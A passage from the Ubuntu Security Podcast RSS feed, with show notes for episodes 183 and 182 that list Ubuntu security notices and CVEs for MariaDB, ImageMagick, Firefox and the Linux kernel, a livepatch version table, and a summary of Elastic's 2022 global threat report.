<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-43680">CVE-2022-43680</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5739-1-mariadb-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5739-1">USN-5739-1</a>] MariaDB vulnerabilities</h3>
<ul>
<li>36 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-32091">CVE-2022-32091</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32089">CVE-2022-32089</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32088">CVE-2022-32088</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32087">CVE-2022-32087</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32086">CVE-2022-32086</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32085">CVE-2022-32085</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32084">CVE-2022-32084</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32083">CVE-2022-32083</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32082">CVE-2022-32082</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32081">CVE-2022-32081</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27458">CVE-2022-27458</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27457">CVE-2022-27457</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27456">CVE-2022-27456</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27455">CVE-2022-27455</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27452">CVE-2022-27452</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27451">CVE-2022-27451</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27449">CVE-2022-27449</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27448">CVE-2022-27448</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27447">CVE-2022-27447</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27446">CVE-2022-27446</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27445">CVE-2022-27445</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27444">CVE-2022-27444</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27387">CVE-2022-27387</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27386">CVE-2022-27386</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27384">CVE-2022-27384</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27383">CVE-2022-27383</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27382">CVE-2022-27382</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27381">CVE-2022-27381</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27380">CVE-2022-27380</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27379">CVE-2022-27379</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27378">CVE-2022-27378</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27377">CVE-2022-27377</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27376">CVE-2022-27376</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21427">CVE-2022-21427</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-46669">CVE-2021-46669</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-25032">CVE-2018-25032</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5740-1-x-dot-org-x-server-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5740-1">USN-5740-1</a>] X.Org X Server vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3551">CVE-2022-3551</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3550">CVE-2022-3550</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5736-1-imagemagick-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5736-1">USN-5736-1</a>] ImageMagick vulnerabilities</h3>
<ul>
<li>17 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-32547">CVE-2022-32547</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32546">CVE-2022-32546</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32545">CVE-2022-32545</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28463">CVE-2022-28463</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1114">CVE-2022-1114</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4219">CVE-2021-4219</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-39212">CVE-2021-39212</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3574">CVE-2021-3574</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20313">CVE-2021-20313</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20312">CVE-2021-20312</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20309">CVE-2021-20309</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20246">CVE-2021-20246</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20245">CVE-2021-20245</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20244">CVE-2021-20244</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20243">CVE-2021-20243</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20241">CVE-2021-20241</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20224">CVE-2021-20224</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5741-1-exim-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5741-1">USN-5741-1</a>] Exim vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3559">CVE-2022-3559</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5742-1-jbig-kit-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5742-1">USN-5742-1</a>] JBIG-KIT vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-9937">CVE-2017-9937</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5743-1-libtiff-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5743-1">USN-5743-1</a>] LibTIFF vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3970">CVE-2022-3970</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5744-1-libice-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5744-1">USN-5744-1</a>] libICE vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-2626">CVE-2017-2626</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5745-1-usn-5745-2-shadow-vulnerability-and-regression">[<a href="https://ubuntu.com/security/notices/USN-5745-1">USN-5745-1</a>, <a href="https://ubuntu.com/security/notices/USN-5745-2">USN-5745-2</a>] shadow vulnerability &amp; regression</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2013-4235">CVE-2013-4235</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Upstream introduced a change in file-system handling in <code>useradd</code> that required
newer glibc - broke on older Ubuntu releases so that update has been reverted
for now on those releases - still is in place on Ubuntu 22.04 LTS / 22.10</li>
</ul>
<h3 id="usn-5689-2-perl-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5689-2">USN-5689-2</a>] Perl vulnerability</h3>
<ul>
<li>1 CVEs addressed in Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-16156">CVE-2020-16156</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5746-1-harfbuzz-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5746-1">USN-5746-1</a>] HarfBuzz vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2015-9274">CVE-2015-9274</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5747-1-bind-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5747-1">USN-5747-1</a>] Bind vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2016-6170">CVE-2016-6170</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-2775">CVE-2016-2775</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5748-1-sysstat-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5748-1">USN-5748-1</a>] Sysstat vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-39377">CVE-2022-39377</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5728-3-linux-kernel--gcp--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5728-3">USN-5728-3</a>] Linux kernel (GCP) vulnerabilities</h3>
<ul>
<li>12 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-42719">CVE-2022-42719</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40768">CVE-2022-40768</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39188">CVE-2022-39188</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3635">CVE-2022-3635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3625">CVE-2022-3625</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3028">CVE-2022-3028</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29901">CVE-2022-29901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2978">CVE-2022-2978</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2153">CVE-2022-2153</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20422">CVE-2022-20422</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41222">CVE-2022-41222</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42703">CVE-2022-42703</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 high priority vulnerabilities both found by Jann Horn (GPZ)
<ul>
<li>UAF in handling of anonymous VMA mappings</li>
<li>UAF in memory management subsytem handling of TLBs</li>
<li>both could be exploited by a local attacker to crash the kernel or get
possible code execution within the kernel and hence escalate privileges</li>
</ul>
</li>
</ul>
<h3 id="usn-5749-1-libsamplerate-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5749-1">USN-5749-1</a>] libsamplerate vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-7697">CVE-2017-7697</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5750-1-gnutls-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5750-1">USN-5750-1</a>] GnuTLS vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-4209">CVE-2021-4209</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5718-2-pixman-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5718-2">USN-5718-2</a>] pixman vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-44638">CVE-2022-44638</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="a-look-at-elastic-security-labs-global-threat-report">A look at Elastic Security Labs Global Threat Report</h3>
<ul>
<li><a href="https://www.elastic.co/pdf/elastic-global-threat-report-vol-1-2022.pdf">https://www.elastic.co/pdf/elastic-global-threat-report-vol-1-2022.pdf</a></li>
<li>Summarises the findings of the Elastic telemetry, which incorporates data from
their various products like Endgame, Endpoint and Security solution.</li>
<li>54% of malware on Windows, 39% on Linux, 6% on MacOS</li>
<li>Of those, top 10 are:
<ul>
<li>Meterpreter, Gafgyt, Mirai, Camelot, Generic, Dofloo, BPFDoor, Ransomexx,
Neshta, Getshell
<ul>
<li>We covered BPFDoor <a href="/episode-161/#bpfdoor-malware-targeting-linux-and-solaris-06-08">previously</a></li>
</ul>
</li>
<li>Of these 80% are trojan-based, 11% are cryptominers, 4% ransomware
<ul>
<li>Trojans commonly used to deploy stager and dropper binaries as part of
wider intrusion effort</li>
<li>Cryptominers generally mining Monero - mostly composed of XMRig family</li>
</ul>
</li>
</ul>
</li>
<li>Also covers details on Windows and MacOS - interestingly Windows still has
lots of CobaltStrike, Metasploit and MimiKatz which are all ostensibly
red-team tools - also see lots of keyloggers as well as credential stealers
(crypto wallets)</li>
<li>Mapped behaviour against MITRE ATT&amp;CK - 34% doing defense evasion, 22%
execution, 10% credential access, 8% persistence, 7% C², 6% privesc and 4%
initial access
<ul>
<li>of this, masquerading (as another legitimate process) and system binary
proxy execution (using existing system binaries to perform malicious
actions) accounts for 72% of defense evasion techniques</li>
</ul>
</li>
<li>Then dive into more detail on execution techniques (mostly native command and
scripting interpreters - think PowerShell, Windows Script Host etc) and
abusing Windows Management Instrumentation (WMI) - but won&rsquo;t go too much into
this here as this is the Ubuntu Security Podcast, not Windows ;)</li>
<li>Also cover metrics from the various public clouds - AWS had 57% of detections
whilst GCP and Azure each had ~22% - why does AWS have so much more? AWS has
at least ⅓ of the global cloud market share whilst Azure has 20% and GCP only
11%
<ul>
<li>Also perhaps AWS users prefer to use Elastic?</li>
</ul>
</li>
<li>Activities they see most in the clouds are Credential Access, Persistence,
Defense Evasion, Initial Access</li>
<li>58% of initial access attempts use brute-force combined with password spraying</li>
<li>Report then breaks down each cloud to look at the activities mostly performed in each
<ul>
<li>AWS - access token stealing is top, Azure showed a large usage of valid
account access to then attempt to retrieve other access tokens or do
phishing, whilst for Google service account abuse was the top</li>
<li>Perhaps is more indicative of what each cloud is used for - ie AWS general
purpose, whilst Azure is AD and managed services, and Google is service
workers</li>
</ul>
</li>
<li>Finally, the report does a deep dive on 4 different threat samples and then
has forecasts and recommendations based on those
<ul>
<li>Of these most are windows specific, but one does predict that Linux VMs used
for backend DevOps in cloud environments will be an increased target</li>
<li>This is not really surprising nor novel, and most OSS devs would likely
expect this threat given the nature of modern CI/CD pipelines and the
follow-up threat to code integrity / supply chain security etc (ie if an
attacker can compromise these machines can then tamper with source code /
build artefacts etc)</li>
</ul>
</li>
<li>As always, requires organisations to have a good security posture and practice
good security hygiene - configure for least privilege, audit what you have,
deploy defense-in-depth solutions, monitoring and logging so can help detect
and have good incident response etc
<ul>
<li>simple things too - deploy MFA, install security updates etc</li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a>,</li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E183.mp3" length="14460954" type="audio/mpeg" /><itunes:duration>810</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 182
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-182/</link>
          <pubDate>Fri, 25 Nov 2022 22:22:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>9728d506bd7e63f66f06563e60030513e28b8e12a664b7d9b7802c3d8f801578df318c43784fd5e7bc93b22a668dd74334b3252e96057bee08a402549c02dab4</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 182</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          After a longer-than-expected break, the Ubuntu Security Podcast is back,
  covering some highlights of the various security items planned during the 23.04
  development cycle, our entrance into the fediverse of Mastodon, some open...
        
        ]]></itunes:subtitle>
        <itunes:summary>  After a longer-than-expected break, the Ubuntu Security Podcast is back,
  covering some highlights of the various security items planned during the 23.04
  development cycle, our entrance into the fediverse of Mastodon, some open
  positions on the team and some of the details of the various security updates
  from the past week.
  </itunes:summary>
        <description>  After a longer-than-expected break, the Ubuntu Security Podcast is back,
  covering some highlights of the various security items planned during the 23.04
  development cycle, our entrance into the fediverse of Mastodon, some open
  positions on the team and some of the details of the various security updates
  from the past week.
  </description>
        <googleplay:description>  After a longer-than-expected break, the Ubuntu Security Podcast is back,
  covering some highlights of the various security items planned during the 23.04
  development cycle, our entrance into the fediverse of Mastodon, some open
  positions on the team and some of the details of the various security updates
  from the past week.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>After a longer-than-expected break, the Ubuntu Security Podcast is back,
covering some highlights of the various security items planned during the 23.04
development cycle, our entrance into the fediverse of Mastodon, some open
positions on the team and some of the details of the various security updates
from the past week.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>67 unique CVEs addressed</p>
<h3 id="usn-5726-1-firefox-vulnerabilities-00-45">[<a href="https://ubuntu.com/security/notices/USN-5726-1">USN-5726-1</a>] Firefox vulnerabilities [00:45]</h3>
<ul>
<li>19 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-45417">CVE-2022-45417</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45416">CVE-2022-45416</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45415">CVE-2022-45415</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45412">CVE-2022-45412</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45421">CVE-2022-45421</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45420">CVE-2022-45420</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45419">CVE-2022-45419</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45418">CVE-2022-45418</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40674">CVE-2022-40674</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45413">CVE-2022-45413</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45411">CVE-2022-45411</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45410">CVE-2022-45410</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45409">CVE-2022-45409</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45408">CVE-2022-45408</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45407">CVE-2022-45407</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45406">CVE-2022-45406</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45405">CVE-2022-45405</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45404">CVE-2022-45404</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-45403">CVE-2022-45403</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Firefox 107.0
<ul>
<li>apparently includes support for power profiling in Intel CPUs as part of the
developer tools</li>
</ul>
</li>
</ul>
<h3 id="lsn-0090-1-linux-kernel-vulnerability-01-16">[<a href="https://ubuntu.com/security/notices/LSN-0090-1">LSN-0090-1</a>] Linux kernel vulnerability [01:16]</h3>
<ul>
<li>6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-42722">CVE-2022-42722</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42721">CVE-2022-42721</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-42720">CVE-2022-42720</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41674">CVE-2022-41674</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2602">CVE-2022-2602</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1015">CVE-2022-1015</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Race condition in <code>io_uring</code> -&gt; UAF (from Pwn2Own 2022)</li>
<li>OOB write in netfilter - requires <code>CAP_NET_ADMIN</code> but this can be obtained from
within an unprivileged user namespace
<ul>
<li>Another example of why the Ubuntu Security team is pushing to disable the
use of unprivileged user namespaces by arbitrary processes in future Ubuntu
releases</li>
</ul>
</li>
</ul>
<h4 id="livepatch-version-information-per-release">Livepatch version information per release</h4>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>canonical-livepatch status
</span></span></code></pre></div><table>
  <thead>
      <tr>
          <th>Kernel type</th>
          <th>22.04</th>
          <th>20.04</th>
          <th>18.04</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>aws</td>
          <td>90.3</td>
          <td>90.2</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-5.15</td>
          <td>—</td>
          <td>90.3</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>90.2</td>
      </tr>
      <tr>
          <td>azure</td>
          <td>90.2</td>
          <td>90.2</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>90.2</td>
      </tr>
      <tr>
          <td>gcp</td>
          <td>90.3</td>
          <td>90.2</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-5.15</td>
          <td>—</td>
          <td>90.3</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>90.2</td>
      </tr>
      <tr>
          <td>generic-5.4</td>
          <td>—</td>
          <td>90.2</td>
          <td>90.2</td>
      </tr>
      <tr>
          <td>gke</td>
          <td>90.3</td>
          <td>90.2</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke-5.15</td>
          <td>—</td>
          <td>90.3</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>90.2</td>
      </tr>
      <tr>
          <td>gkeop</td>
          <td>—</td>
          <td>90.2</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gkeop-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>90.2</td>
      </tr>
      <tr>
          <td>ibm</td>
          <td>90.2</td>
          <td>90.2</td>
          <td>—</td>
      </tr>
      <tr>
          <td>ibm-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>90.2</td>
      </tr>
      <tr>
          <td>linux</td>
          <td>90.2</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency</td>
          <td>90.2</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency-5.4</td>
          <td>—</td>
          <td>90.2</td>
          <td>90.2</td>
      </tr>
  </tbody>
</table>
<h3 id="usn-5727-1-linux-kernel-vulnerabilities-02-31">[<a href="https://ubuntu.com/security/notices/USN-5727-1">USN-5727-1</a>] Linux kernel vulnerabilities [02:31]</h3>
<ul>
<li>7 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-40768">CVE-2022-40768</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-36879">CVE-2022-36879</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3635">CVE-2022-3635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3028">CVE-2022-3028</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2978">CVE-2022-2978</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2153">CVE-2022-2153</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-20422">CVE-2022-20422</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5728-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5728-1">USN-5728-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>12 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-42719">CVE-2022-42719</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40768">CVE-2022-40768</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-39188">CVE-2022-39188</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3635">CVE-2022-3635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3625">CVE-2022-3625</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3028">CVE-2022-3028</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29901">CVE-2022-29901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2978">CVE-2022-2978</a> <!-- raw HTML omitted --></li>
